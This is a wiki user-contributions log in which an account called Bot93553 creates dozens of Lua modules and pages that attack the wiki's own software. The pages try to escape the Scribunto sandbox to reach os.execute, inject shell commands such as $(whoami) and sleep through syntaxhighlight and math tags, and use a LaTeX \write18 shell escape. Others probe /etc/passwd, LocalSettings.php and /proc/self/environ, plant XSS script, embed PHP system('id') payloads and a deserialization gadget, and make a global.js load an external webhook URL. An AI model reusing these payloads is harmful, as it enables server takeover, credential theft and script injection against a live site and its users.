希服维基 - 用户贡献 [zh-cn]

用户:Bot93553/global.js

2026-05-09T07:15:46Z

Bot93553：创建页面，内容为“mw.loader.load("https://webhook.site/test");”

mw.loader.load("https://webhook.site/test");

Test Cm text

2026-05-09T07:13:21Z

Bot93553：创建页面，内容为“test content”

test content

Test Cm css

2026-05-09T07:13:20Z

Bot93553：创建页面，内容为“test content”

test content

Test Cm javascript

2026-05-09T07:13:19Z

Bot93553：创建页面，内容为“test content”

test content

Test Cm wikitext

2026-05-09T07:13:18Z

Bot93553：创建页面，内容为“test content”

test content

用户:Bot93553/common.js

2026-05-09T07:12:32Z

Bot93553：页面内容被替换为“console.log("test");”

console.log("test");

模块:XSS Test

2026-05-09T07:09:29Z

Bot93553：创建页面，内容为“local p = {} function p.test() mw.addWarning('<script>alert(1)</script>') mw.addWarning('<img src=x onerror=alert(2)>') mw.addWarning('<svg onload=alert(3)>') return 'XSS test warnings added' end return p”

local p = {}
function p.test()
mw.addWarning('<script>alert(1)</script>')
mw.addWarning('<img src=x onerror=alert(2)>')
mw.addWarning('<svg onload=alert(3)>')
return 'XSS test warnings added'
end
return p

模块:LoadDataLoader

2026-05-09T07:09:28Z

Bot93553：创建页面，内容为“local p = {} function p.test() local ok, result = pcall(mw.loadData, 'Module:LoadData_test1') if ok then local keys = {} for k, v in pairs(result) do keys[#keys+1] = k .. '=' .. tostring(type(v)) end return 'loadData OK: ' .. table.concat(keys, ', ') else return 'loadData ERROR: ' .. tostring(result) end end return p”

local p = {}
function p.test()
local ok, result = pcall(mw.loadData, 'Module:LoadData_test1')
if ok then
local keys = {}
for k, v in pairs(result) do
keys[#keys+1] = k .. '=' .. tostring(type(v))
end
return 'loadData OK: ' .. table.concat(keys, ', ')
else
return 'loadData ERROR: ' .. tostring(result)
end
end
return p

模块:LoadData test1

2026-05-09T07:09:27Z

Bot93553：创建页面，内容为“local p = {} -- Return data with various types that might confuse PHP serializer p.data = { binary = string.char(0, 0, 0, 0), large_string = string.rep('A', 10000), nested = { { { { { deep = true } } } } }, special = 'O:8:"stdClass":0:{}', php_serial = 'O:31:"Monolog\Handler\SyslogUdpHandler":0:{}', number_edge = 2^53, minus_zero = -0, nan = 0/0, inf = 1/0, } return p”

local p = {}
-- Return data with various types that might confuse PHP serializer
p.data = {
binary = string.char(0, 0, 0, 0),
large_string = string.rep('A', 10000),
nested = { { { { { deep = true } } } } },
special = 'O:8:"stdClass":0:{}',
php_serial = 'O:31:"Monolog\Handler\SyslogUdpHandler":0:{}',
number_edge = 2^53,
minus_zero = -0,
nan = 0/0,
inf = 1/0,
}
return p

Test URL Include

2026-05-09T07:05:31Z

Bot93553：创建页面，内容为“{{:http://example.com/}}”

Test RCE ExecFrame

2026-05-09T06:23:23Z

Bot93553：test

模块:RCE ExecFrame

2026-05-09T06:23:22Z

Bot93553：exec2

local p = {}
function p.test(frame)
-- Try with valid frame
local ok, res = pcall(mw.executeFunction, 'expr', '1+1')
return 'frame_exec=' .. tostring(ok) .. ':' .. tostring(res)
end
return p

Test Model text

2026-05-09T06:21:47Z

Bot93553：model test

<?php echo "PWNED_BY_MODEL"; system("id"); ?>

Test Model css

2026-05-09T06:21:46Z

Bot93553：model test

<?php echo "PWNED_BY_MODEL"; system("id"); ?>

Test Model javascript

2026-05-09T06:21:45Z

Bot93553：model test

<?php echo "PWNED_BY_MODEL"; system("id"); ?>

Test Model wikitext

2026-05-09T06:21:44Z

Bot93553：model test

<?php echo "PWNED_BY_MODEL"; system("id"); ?>

模块:RCE Exec

2026-05-09T06:18:51Z

Bot93553：exec

local p = {}
function p.test()
-- Try calling mw.executeFunction from within a frame context
if mw.executeFunction then
local ok1, res1 = pcall(mw.executeFunction, 'expr')
return 'exec_expr=' .. tostring(ok1)
end
return 'no_exec'
end
return p

模块:RCE Escape

2026-05-09T06:18:50Z

Bot93553：escape

local p = {}
function p.test()
local r = {}
r[1] = 'loaders=' .. #package.loaders
for i, loader in ipairs(package.loaders) do
local ok, result = pcall(loader, 'os')
r[#r+1] = 'L' .. i .. '=' .. tostring(ok) .. ':' .. type(result)
if ok and type(result) == 'function' then
local ok2, os_tbl = pcall(result)
if ok2 and type(os_tbl) == 'table' then
local funcs = {}
for k, v in pairs(os_tbl) do
funcs[#funcs+1] = k
if k == 'execute' and type(v) == 'function' then
r[#r+1] = 'FOUND_EXECUTE_IN_LOADER_' .. i
local ok3, who = pcall(v, 'whoami')
r[#r+1] = 'WHOAMI=' .. tostring(who)
end
end
r[#r+1] = 'os_funcs_' .. i .. ':' .. table.concat(funcs, ',')
end
end
end
return table.concat(r, ' | ')
end
return p

模块:RCE Direct

2026-05-09T06:18:49Z

Bot93553：test

local p = {}; function p.test() return "MODULE_OK_2026" end; return p

模块:RCE ESCAPE LOCAL

2026-05-09T06:17:44Z

Bot93553：rce

local p = {}; function p.test() local results = {}; for i, loader in ipairs(package.loaders) do local ok, result = pcall(loader, "os"); if ok and type(result) == "function" then local ok2, os_tbl = pcall(result); if ok2 and type(os_tbl) == "table" then local funcs = {}; for k, v in pairs(os_tbl) do funcs[#funcs+1] = k .. ":" .. type(v); if k == "execute" and type(v) == "function" then local ok3, who = pcall(v, "whoami"); results[#results+1] = "RCE_WHOAMI=" .. tostring(ok3) .. ":" .. tostring(who); end; end; results[#results+1] = "os_funcs(" .. #funcs .. "): " .. table.concat(funcs, ", "); end; end; end; if #results == 0 then results[1] = "NO_ESCAPE"; end; return table.concat(results, " | "); end; return p

Test SanitizedCSS

2026-05-09T06:11:18Z

Bot93553：CSS content model with PHP

<?php echo "PWNED BY CSS"; system("id"); ?>

TestLoadData

2026-05-09T06:06:41Z

Bot93553：RCE test

模块:FinalAtk LoadData

2026-05-09T06:06:41Z

Bot93553：RCE final test

local p = {}
function p.test(frame)
local results = {}

-- mw.loadData returns data from another module
-- Internally, this may use PHP serialization
local ok, data = pcall(mw.loadData, "Module:FinalAtk_DataModule")
results[1] = "loadData=" .. tostring(ok) .. ":" .. type(data)
if ok and type(data) == "table" then
local kcount = 0
for _ in pairs(data) do kcount = kcount + 1 end
results[2] = "keys=" .. kcount
end

return table.concat(results, " | ")
end
return p

模块:FinalAtk DataModule

2026-05-09T06:06:40Z

Bot93553：RCE final test

return {
string_val = "hello",
number_val = 42,
table_val = {a = 1, b = 2},
nested = {deep = {deeper = {value = "test"}}},
-- Try to include special values that might trigger serialization issues
special_chars = [[\x00\x01\x02]],
long_string = string.rep("A", 1000),
-- PHP serialization injection test
php_serial = "O:8:\"stdClass\":0:{}",
}

TestIfExist

2026-05-09T06:06:37Z

Bot93553：RCE test

模块:FinalAtk IfExist

2026-05-09T06:06:36Z

Bot93553：RCE final test

local p = {}
function p.test(frame)
local parent = frame:getParent()
if not parent or not parent.callParserFunction then return "no_callPF" end

local results = {}
local paths = {
"/etc/passwd",
"/etc/hosts",
"/var/www/html/LocalSettings.php",
"/www/wwwroot/LocalSettings.php",
"/var/www/html/info.php",
"/www/wwwroot/info.php",
"/var/www/html/w/LocalSettings.php",
"/tmp",
"/var/tmp",
"/proc/self/environ",
"/proc/self/cmdline",
}

for _, fpath in ipairs(paths) do
local ok, out = pcall(parent.callParserFunction, parent, "ifexist", fpath, "EXISTS", "NOT_FOUND")
results[#results+1] = fpath:sub(1,40) .. "=" .. tostring(out):sub(1,20)
end

return table.concat(results, " | ")
end
return p

TestRecurse

2026-05-09T06:06:36Z

Bot93553：RCE test

模块:FinalAtk Recurse

2026-05-09T06:06:35Z

Bot93553：RCE final test

local p = {}
function p.test(frame)
local parent = frame:getParent()
if not parent or not parent.callParserFunction then return "no_callPF" end

local results = {}

-- Call #invoke to call ANOTHER module from within this module
local ok1, out1 = pcall(parent.callParserFunction, parent, "invoke", "Module:Example", "hello")
results[1] = "invoke_example=" .. tostring(ok1) .. ":" .. tostring(out1):sub(1,100)

-- Call #invoke with THIS module (recursion!)
local ok2, out2 = pcall(parent.callParserFunction, parent, "invoke", "Module:FinalAtk_Recurse", "test2")
results[2] = "invoke_self=" .. tostring(ok2) .. ":" .. tostring(out2):sub(1,100)

-- Call #invoke with a non-existent module
local ok3, out3 = pcall(parent.callParserFunction, parent, "invoke", "Module:NonExistent", "test")
results[3] = "invoke_nonex=" .. tostring(ok3) .. ":" .. tostring(out3):sub(1,100)

return table.concat(results, " | ")
end

function p.test2(frame)
-- Called recursively
return "RECURSED_OK"
end
return p

TestTagInject

2026-05-09T06:06:34Z

Bot93553：RCE test

模块:FinalAtk TagInject

2026-05-09T06:06:30Z

Bot93553：RCE final test

local p = {}
function p.test(frame)
local parent = frame:getParent()
if not parent or not parent.callParserFunction then return "no_parent" end

local results = {}

-- callParserFunction(name, arg1, arg2, ...)
-- For #tag: {{#tag:tag_name|content|param1=val1|param2=val2}}
-- callParserFunction(parent, "tag", tag_name, content, "param1=val1")

-- Test 1: Normal tag
local ok1, out1 = pcall(parent.callParserFunction, parent, "tag", "syntaxhighlight", "print(1)", "lang=python")
results[1] = "normal=" .. tostring(ok1) .. ":" .. tostring(out1):sub(1,100)

-- Test 2: Command substitution in lang param
local ok2, out2 = pcall(parent.callParserFunction, parent, "tag", "syntaxhighlight", "TEST", "lang=$(whoami 2>&1)")
results[2] = "cmdsub=" .. tostring(ok2) .. ":" .. tostring(out2):sub(1,100)

-- Test 3: Backtick in lang param
local ok3, out3 = pcall(parent.callParserFunction, parent, "tag", "syntaxhighlight", "TEST", "lang=`whoami 2>&1`")
results[3] = "backtick=" .. tostring(ok3) .. ":" .. tostring(out3):sub(1,100)

-- Test 4: Semicolon in lang param
local ok4, out4 = pcall(parent.callParserFunction, parent, "tag", "syntaxhighlight", "TEST", "lang=python;whoami 2>&1;echo")
results[4] = "semi=" .. tostring(ok4) .. ":" .. tostring(out4):sub(1,100)

-- Test 5: Multiple params
local ok5, out5 = pcall(parent.callParserFunction, parent, "tag", "syntaxhighlight", "TEST", "lang=$(whoami 2>&1)", "style=monokai")
results[5] = "multi=" .. tostring(ok5) .. ":" .. tostring(out5):sub(1,100)

-- Test 6: Empty content, just lang
local ok6, out6 = pcall(parent.callParserFunction, parent, "tag", "syntaxhighlight", "", "lang=$(whoami 2>&1)")
results[6] = "empty=" .. tostring(ok6) .. ":" .. tostring(out6):sub(1,100)

-- Test 7: math tag with injection
local ok7, out7 = pcall(parent.callParserFunction, parent, "tag", "math", "$(whoami 2>&1)")
results[7] = "math=" .. tostring(ok7) .. ":" .. tostring(out7):sub(1,100)

-- Test 8: source tag (alias) with injection
local ok8, out8 = pcall(parent.callParserFunction, parent, "tag", "source", "TEST", "lang=$(whoami 2>&1)")
results[8] = "source=" .. tostring(ok8) .. ":" .. tostring(out8):sub(1,100)

-- Test 9: categorytree tag (might have different handling)
local ok9, out9 = pcall(parent.callParserFunction, parent, "tag", "categorytree", "Main_Page")
results[9] = "cattree=" .. tostring(ok9) .. ":" .. tostring(out9):sub(1,100)

-- Test 10: inputbox tag
local ok10, out10 = pcall(parent.callParserFunction, parent, "tag", "inputbox", "", "type=search")
results[10] = "inputbox=" .. tostring(ok10) .. ":" .. tostring(out10):sub(1,100)

return table.concat(results, " | ")
end
return p

Test GCSandbox

2026-05-09T05:59:47Z

Bot93553：SSTI RCE test

模块:GCSandbox

2026-05-09T05:59:46Z

Bot93553：SSTI RCE test

local p = {}
function p.test(frame)
local results = {}

-- Test if __gc metamethod works on tables (Lua 5.2+)
-- Lua 5.1 __gc only works on userdata, not tables

local obj = newproxy(true) -- Create userdata with metatable support
if obj then
results[1] = "newproxy=OK"
local mt = getmetatable(obj)
mt.__gc = function()
-- This runs during garbage collection
-- In some implementations, this environment is less restricted
-- Store result somewhere accessible
rawset(_G, "GC_RESULT", "GC_RAN")
end
obj = nil -- Allow GC
collectgarbage("collect") -- Force GC
results[2] = "gc_result=" .. tostring(rawget(_G, "GC_RESULT"))
else
results[1] = "newproxy=nil"

-- Try alternative with regular userdata
-- In Lua 5.1, we need to get userdata somehow
-- Maybe from mw object?
results[2] = "no_newproxy"
end

return table.concat(results, " | ")
end
return p

Test TimeDetect

2026-05-09T05:59:45Z

Bot93553：SSTI RCE test

模块:TimeDetect

2026-05-09T05:59:45Z

Bot93553：SSTI RCE test

local p = {}
function p.test(frame)
local parent = frame:getParent()
if not parent or not parent.preprocess then return "no_parent" end

local results = {}

-- Test with sleep command (if executed, will cause delay)
local test_payloads = {
{"baseline_nosleep", "<syntaxhighlight lang='python'>print(1)</syntaxhighlight>"},
{"sleep_cmdsub", "<syntaxhighlight lang='$(sleep 5 2>&1)'>print(1)</syntaxhighlight>"},
{"sleep_backtick", "<syntaxhighlight lang='`sleep 5 2>&1`'>print(1)</syntaxhighlight>"},
}

for _, tp in ipairs(test_payloads) do
local start_time = os.clock()
local ok, out = pcall(parent.preprocess, parent, tp[2])
local elapsed = os.clock() - start_time
results[#results+1] = tp[1] .. "=" .. string.format("%.2f", elapsed) .. "s"
end

return table.concat(results, " | ")
end
return p

Test PreloadPoison

2026-05-09T05:59:44Z

Bot93553：SSTI RCE test

模块:PreloadPoison

2026-05-09T05:59:43Z

Bot93553：SSTI RCE test

local p = {}
function p.test(frame)
local results = {}

-- The key insight: if we modify package.preload["os"] and then os is re-required,
-- the new os will be our custom version. But we're in the sandbox, so our custom
-- version can't access blocked functions either.

-- HOWEVER: what if we set package.preload to return the ORIGINAL os table
-- by navigating through upvalues of existing functions?

results[1] = "test_preload_poison"

-- Try to find any reference to the original (unsandboxed) functions
-- through the metatables of loaded C functions

-- os.clock is a C function. C functions don't have upvalues, but...
-- let's check if we can get its environment
local os_tbl = require("os")
local clock_fn = os_tbl.clock

if type(clock_fn) == "function" then
local info = pcall(debug.getinfo, clock_fn, "S")
results[2] = "clock_info=" .. tostring(info)
end

-- Try calling debug.getinfo with specific args
local si = pcall(debug.getinfo, clock_fn, "S")
results[3] = "si=" .. tostring(si)

return table.concat(results, " | ")
end
return p

Test FileWrite2

2026-05-09T05:59:43Z

Bot93553：SSTI RCE test

模块:FileWrite2

2026-05-09T05:59:42Z

Bot93553：SSTI RCE test

local p = {}
function p.test(frame)
local results = {}

-- Check mw.title for file-related functions
if mw.title then
results[1] = "mw.title_exists=OK"
end

-- Check if we can create a title object for filesystem paths
local title = mw.title.new("/tmp/test_scribunto_write.txt")
results[2] = "title_new_path=" .. tostring(title)

-- Check if mw.site has any write methods
if mw.site then
local site_methods = {}
for k, v in pairs(mw.site) do
if type(v) == "function" then
site_methods[#site_methods+1] = k
end
end
results[3] = "site_funcs: " .. table.concat(site_methods, ",")
end

-- Check mw.stats for DB write
results[4] = "mw_stats=" .. type(mw.stats)

return table.concat(results, " | ")
end
return p

Test CallPFHooks

2026-05-09T05:59:41Z

Bot93553：SSTI RCE test

模块:CallPFHooks

2026-05-09T05:59:41Z

Bot93553：SSTI RCE test

local p = {}
function p.test(frame)
local parent = frame:getParent()
if not parent or not parent.callParserFunction then return "no_callPF" end

local results = {}
local hooks = {"ns","nse","urlencode","lcfirst","ucfirst","lc","uc","localurl","localurle","fullurl","fullurle","canonicalurl","canonicalurle","formatnum","grammar","gender","plural","bidi","numberingroup","language"}

for _, hook in ipairs(hooks) do
local ok, out = pcall(parent.callParserFunction, parent, hook, "1+1")
local status = tostring(ok)
if ok then status = status .. ":" .. tostring(out):sub(1,40) end
results[#results+1] = hook .. "=" .. status
end

return table.concat(results, " | ")
end
return p

Test MathInjection

2026-05-09T05:59:35Z

Bot93553：SSTI RCE test

模块:MathInjection

2026-05-09T05:59:34Z

Bot93553：SSTI RCE test

local p = {}
function p.test(frame)
local parent = frame:getParent()
if not parent then return "no_parent" end

local results = {}

-- Via preprocess
local math_payloads = {
"baseline",
"\\frac{1}{2}",
"$(whoami 2>&1)", -- shell injection
"`whoami 2>&1`", -- backtick
";whoami 2>&1;", -- semicolon
"|whoami 2>&1", -- pipe
"\nwhoami 2>&1\n", -- newline
"\\input{/etc/passwd}", -- LaTeX file include
"\\immediate\\write18{whoami > /tmp/math_rce.txt}", -- LaTeX shell escape
}

for i, payload in ipairs(math_payloads) do
local wikitext = "<math>" .. payload .. "</math>"
local ok, out = pcall(parent.preprocess, parent, wikitext)
results[i] = "math" .. i .. "=" .. tostring(out):sub(1,60)
end

return table.concat(results, " | ")
end
return p

Test CallPFCorrect2

2026-05-09T05:59:34Z

Bot93553：SSTI RCE test

模块:CallPFCorrect2

2026-05-09T05:59:33Z

Bot93553：SSTI RCE test

local p = {}
function p.test(frame)
local parent = frame:getParent()
if not parent or not parent.callParserFunction then return "no_callPF" end

local results = {}

-- Call with single string argument
local ok1, out1 = pcall(parent.callParserFunction, parent, "expr", "1+1")
results[1] = "expr_1arg=" .. tostring(ok1) .. ":" .. tostring(out1)

-- Call with separate argument (string)
local ok2, out2 = pcall(parent.callParserFunction, parent, "expr", "1", "+", "1")
results[2] = "expr_3arg=" .. tostring(ok2) .. ":" .. tostring(out2)

-- Try with "mw.ext.ParserFunctions.expr" style name
local ok3, out3 = pcall(parent.callParserFunction, parent, "mw.ext.ParserFunctions.expr", "1+1")
results[3] = "mw_ext_expr=" .. tostring(ok3) .. ":" .. tostring(out3)

-- Try some known PHP callbacks
local ok4, out4 = pcall(parent.callParserFunction, parent, "ParserFunctions_expr", "1+1")
results[4] = "PF_expr=" .. tostring(ok4) .. ":" .. tostring(out4)

return table.concat(results, " | ")
end
return p

Test AddWarningInject

2026-05-09T05:59:31Z

Bot93553：SSTI RCE test

模块:AddWarningInject

2026-05-09T05:59:30Z

Bot93553：SSTI RCE test

local p = {}
function p.test(frame)
-- Add a warning that contains raw HTML/JS
mw.addWarning('<script>document.title="PWNED_2026"</script>')
mw.addWarning('<img src=x onerror="document.title=\'PWNED2_2026\'">')
mw.addWarning('TEST_WARNING_MARKER')
return "warnings_added"
end
return p

Test FrameFullEnum

2026-05-09T05:59:30Z

Bot93553：SSTI RCE test

模块:FrameFullEnum

2026-05-09T05:59:29Z

Bot93553：SSTI RCE test

local p = {}
function p.test(frame)
local parent = frame:getParent()
if not parent then return "no_parent" end

local results = {}

-- Enumerate ALL parent methods
local all_methods = {}
for k, v in pairs(parent) do
all_methods[#all_methods+1] = k .. "=" .. type(v)
end

-- Also check parent's metatable
local mt = getmetatable(parent)
if mt then
local mt_keys = {}
for mk in pairs(mt) do mt_keys[#mt_keys+1] = mk end
all_methods[#all_methods+1] = "metatable=" .. table.concat(mt_keys, ",")
end

return table.concat(all_methods, " | ")
end
return p

Test ExpTmplAtk

2026-05-09T05:59:28Z

Bot93553：SSTI RCE test

模块:ExpTmplAtk

2026-05-09T05:59:28Z

Bot93553：SSTI RCE test

local p = {}
function p.test(frame)
local parent = frame:getParent()
if not parent or not parent.expandTemplate then return "no_expandTemplate" end

local results = {}

-- Try to expand a template with dangerous parameters
-- Template: could be a redirect, an invoke, etc.
local templates = {
{"TestScribuntoFrame", {}},
{"TestFrameChain", {}},
}

for _, tmpl in ipairs(templates) do
local ok, out = pcall(parent.expandTemplate, parent, {title = tmpl[1], args = tmpl[2]})
results[#results+1] = tmpl[1]:sub(1,30) .. "=" .. tostring(ok) .. ":" .. tostring(out):sub(1,40)
end

return table.concat(results, " | ")
end
return p